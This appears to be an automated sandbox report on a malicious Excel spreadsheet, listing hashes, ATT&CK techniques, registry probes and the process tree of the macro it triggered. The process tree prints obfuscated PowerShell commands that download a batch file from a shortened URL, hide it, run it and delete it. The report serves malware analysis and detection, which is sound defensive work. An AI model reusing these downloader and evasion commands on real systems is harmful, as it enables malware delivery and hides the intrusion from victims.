0d97fd00e07fa37cfcd42d48e2a47e319f3865110afe30e46cc0504d6d50bc35

General

Target

d8032c71de22af1a399435b344ca825689ee175529c98fce2529f128f8357dc2.xls
Size

67KB
MD5

85a5ea8dcd78a8df15d7e49bb5f22387
SHA1

4f3765768183cbf79e220df9a15ca778c2385b64
SHA256

d8032c71de22af1a399435b344ca825689ee175529c98fce2529f128f8357dc2
SHA512

ccf1a3c0a39aec76d3da09085b5f3e98dc2540545109a7654bba41f4d2c9bfc03edfe37c3a3ce1276f9795fd5f5c7ae476fb9e58e0b386b8f75ea6f59ba785a5
SSDEEP

1536:+MnSGiysRchNXHfA1MiWhZFGkEld+Dr7JmSb4wIE7zp0RhBv1hQz7rT01aG:+MnSGiysRchNXHfA1MiWhZFGkEld+Dri

Score

10^/10

defense_evasion

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://tinyurl.com/y677kmz8

Signatures

Process spawned unexpected child process 5 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4032	1120	cmd.exe	85
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3040	1120	cmd.exe	85
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2040	1120	cmd.exe	85
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3208	1120	cmd.exe	85
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1540	1120	cmd.exe	85

Blocklisted process makes network request 2 IoCs

flow	pid	Process
21	4740	powershell.exe
24	4740	powershell.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5948	attrib.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1120	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
5808	powershell.exe
5808	powershell.exe
4820	powershell.exe
4820	powershell.exe
5044	powershell.exe
5044	powershell.exe
4740	powershell.exe
4740	powershell.exe
4740	powershell.exe
3504	powershell.exe
3504	powershell.exe
5044	powershell.exe
3504	powershell.exe
5808	powershell.exe
4820	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	5808	powershell.exe
Token: SeDebugPrivilege	4820	powershell.exe
Token: SeDebugPrivilege	5044	powershell.exe
Token: SeDebugPrivilege	4740	powershell.exe
Token: SeDebugPrivilege	3504	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
1120	EXCEL.EXE
1120	EXCEL.EXE
1120	EXCEL.EXE
1120	EXCEL.EXE
1120	EXCEL.EXE
1120	EXCEL.EXE
1120	EXCEL.EXE
1120	EXCEL.EXE
1120	EXCEL.EXE
1120	EXCEL.EXE
1120	EXCEL.EXE
1120	EXCEL.EXE

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 1120 wrote to memory of 4032	1120	EXCEL.EXE	87
PID 1120 wrote to memory of 4032	1120	EXCEL.EXE	87
PID 1120 wrote to memory of 3040	1120	EXCEL.EXE	90
PID 1120 wrote to memory of 3040	1120	EXCEL.EXE	90
PID 1120 wrote to memory of 2040	1120	EXCEL.EXE	91
PID 1120 wrote to memory of 2040	1120	EXCEL.EXE	91
PID 1120 wrote to memory of 3208	1120	EXCEL.EXE	92
PID 1120 wrote to memory of 3208	1120	EXCEL.EXE	92
PID 1120 wrote to memory of 1540	1120	EXCEL.EXE	93
PID 1120 wrote to memory of 1540	1120	EXCEL.EXE	93
PID 2040 wrote to memory of 5044	2040	cmd.exe	99
PID 1540 wrote to memory of 4740	1540	cmd.exe	100
PID 1540 wrote to memory of 4740	1540	cmd.exe	100
PID 2040 wrote to memory of 5044	2040	cmd.exe	99
PID 3208 wrote to memory of 5808	3208	cmd.exe	102
PID 3208 wrote to memory of 5808	3208	cmd.exe	102
PID 4032 wrote to memory of 4820	4032	cmd.exe	101
PID 4032 wrote to memory of 4820	4032	cmd.exe	101
PID 3040 wrote to memory of 3504	3040	cmd.exe	103
PID 3040 wrote to memory of 3504	3040	cmd.exe	103
PID 5044 wrote to memory of 5948	5044	powershell.exe	107
PID 5044 wrote to memory of 5948	5044	powershell.exe	107

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5948	attrib.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\d8032c71de22af1a399435b344ca825689ee175529c98fce2529f128f8357dc2.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1120
- C:\Windows\SYSTEM32\cmd.exe
  cmd /k p^owershel^l -w 1 stARt`-slE`Ep 3; Move-Item "pd.bat" -Destination "$e`nV:T`EMP"
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:4032
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -w 1 stARt`-slE`Ep 3; Move-Item "pd.bat" -Destination "$e`nV:T`EMP"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4820
- C:\Windows\SYSTEM32\cmd.exe
  cmd /k p^owershel^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:3040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3504
- C:\Windows\SYSTEM32\cmd.exe
  cmd /k p^owershel^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:2040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5044
  - - C:\Windows\system32\attrib.exe
      "C:\Windows\system32\attrib.exe" +s +h pd.bat
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:5948
- C:\Windows\SYSTEM32\cmd.exe
  cmd /k p^owershel^l -w 1 stARt`-slE`Ep 7;cd "$e`nV:T`EMP; ./pd.bat"
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:3208
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -w 1 stARt`-slE`Ep 7;cd "$e`nV:T`EMP; ./pd.bat"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5808
- C:\Windows\SYSTEM32\cmd.exe
  cmd /k powershel^l -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"('https://tinyurl.com/y677kmz8','pd.bat')
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:1540
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"('https://tinyurl.com/y677kmz8','pd.bat')
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4740

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

2

T1564

Hidden Files and Directories

2

T1564.001

Indicator Removal

1

T1070

File Deletion

1

T1070.004

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7c7f5f5ca4365f9e56b48408964dccae

SHA1
f23d7d1fbe4dae849772617338ee8a6961f31187

SHA256
ec23cdd55f689227f0bc56c723459b1666c4a918954ea83529f51f743c7c5dd3

SHA512
b09d0b6cd4612c0912c77873229efdcec43d54399af82840447d58445de41e990d55b1160a4da315afd54e3fa41d0c42ede4f4ff24c1db9f5f6bb93d7022c207

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ea56f0298be1009b6340d46cb5151953

SHA1
0b8ca66445a249119d891aab365b55054b4a7a4a

SHA256
6aa429bd67fcac4c71eadfc0b5b378f5ad93c7b27b4c92c31de163a4ed0739dc

SHA512
291600ad5ed2a27577a898a7da055184316fab6620e0dba44caaa56c5abcf48b6702071967f107219001772530d646e3c7c90a1f3d2eca925d2b8b119705ae1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2a1e525ef721644ee37cf1052daac692

SHA1
968bb6fb268099aebc1275bed9ecb68889566cc3

SHA256
4c4fd2e370c8db9c91d92696802692e5955b5aff1a69bea1bcd704c7654fdc7d

SHA512
2b7ed1c9aa8648f67aa2272a47f86a8395e4f3b9ecf3ae40fbf9073e2c5bbc0d8274fb36231bd467e69cbbcff65a56510ebd1f205932a360740df43d1943eaa2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
abfaab384a6bf8fe24e96b3327a03905

SHA1
47379c161ac1086855bc0cf9a88eb0ee9863f42b

SHA256
6a422f88e098572b6d1411a9bd1bbe97ec7d961e81f3a749e1d84fcfface65ab

SHA512
a10dc184825414ffad325bab3137d1995e45217aad39ab2e1738c51cc44adce61eaa819f36b5c9e8f8845a26253f651e865e23395d630e94e6e6cee08d9e0296

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wpe2v1yl.fic.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
1KB

MD5
62828ab6c7a5a760d3041f562c5d70d8

SHA1
34ec735db6ec01cd6ef2e7626fb9d343d9d4f140

SHA256
6073b0284db65c473387992d2cfc1511409756abe29cbef35326cf7a443111f5

SHA512
13afdab084c044aac2829f01cfdb90a697b66203cd144812bda15f15e0aac0003feb80e3315365a00afe3fe91c5e1a46c76ac76b6e2447c1ac84886763e929ce

Download Submit
memory/1120-11-0x00007FFA75C30000-0x00007FFA75E25000-memory.dmp

Filesize
2.0MB

Download
memory/1120-21-0x00007FFA75C30000-0x00007FFA75E25000-memory.dmp

Filesize
2.0MB

Download
memory/1120-10-0x00007FFA75C30000-0x00007FFA75E25000-memory.dmp

Filesize
2.0MB

Download
memory/1120-12-0x00007FFA33AA0000-0x00007FFA33AB0000-memory.dmp

Filesize
64KB

Download
memory/1120-8-0x00007FFA75C30000-0x00007FFA75E25000-memory.dmp

Filesize
2.0MB

Download
memory/1120-6-0x00007FFA75C30000-0x00007FFA75E25000-memory.dmp

Filesize
2.0MB

Download
memory/1120-13-0x00007FFA33AA0000-0x00007FFA33AB0000-memory.dmp

Filesize
64KB

Download
memory/1120-14-0x00007FFA75C30000-0x00007FFA75E25000-memory.dmp

Filesize
2.0MB

Download
memory/1120-15-0x00007FFA75C30000-0x00007FFA75E25000-memory.dmp

Filesize
2.0MB

Download
memory/1120-16-0x00007FFA75C30000-0x00007FFA75E25000-memory.dmp

Filesize
2.0MB

Download
memory/1120-18-0x00007FFA75C30000-0x00007FFA75E25000-memory.dmp

Filesize
2.0MB

Download
memory/1120-19-0x00007FFA75C30000-0x00007FFA75E25000-memory.dmp

Filesize
2.0MB

Download
memory/1120-22-0x00007FFA75C30000-0x00007FFA75E25000-memory.dmp

Filesize
2.0MB

Download
memory/1120-3-0x00007FFA35CB0000-0x00007FFA35CC0000-memory.dmp

Filesize
64KB

Download
memory/1120-20-0x00007FFA75C30000-0x00007FFA75E25000-memory.dmp

Filesize
2.0MB

Download
memory/1120-17-0x00007FFA75C30000-0x00007FFA75E25000-memory.dmp

Filesize
2.0MB

Download
memory/1120-2-0x00007FFA35CB0000-0x00007FFA35CC0000-memory.dmp

Filesize
64KB

Download
memory/1120-9-0x00007FFA75C30000-0x00007FFA75E25000-memory.dmp

Filesize
2.0MB

Download
memory/1120-7-0x00007FFA75C30000-0x00007FFA75E25000-memory.dmp

Filesize
2.0MB

Download
memory/1120-0-0x00007FFA35CB0000-0x00007FFA35CC0000-memory.dmp

Filesize
64KB

Download
memory/1120-5-0x00007FFA35CB0000-0x00007FFA35CC0000-memory.dmp

Filesize
64KB

Download
memory/1120-85-0x00007FFA75C30000-0x00007FFA75E25000-memory.dmp

Filesize
2.0MB

Download
memory/1120-86-0x00007FFA75CCD000-0x00007FFA75CCE000-memory.dmp

Filesize
4KB

Download
memory/1120-87-0x00007FFA75C30000-0x00007FFA75E25000-memory.dmp

Filesize
2.0MB

Download
memory/1120-1-0x00007FFA75CCD000-0x00007FFA75CCE000-memory.dmp

Filesize
4KB

Download
memory/1120-90-0x00007FFA75C30000-0x00007FFA75E25000-memory.dmp

Filesize
2.0MB

Download
memory/1120-4-0x00007FFA35CB0000-0x00007FFA35CC0000-memory.dmp

Filesize
64KB

Download
memory/5808-36-0x000002AD42B60000-0x000002AD42B82000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads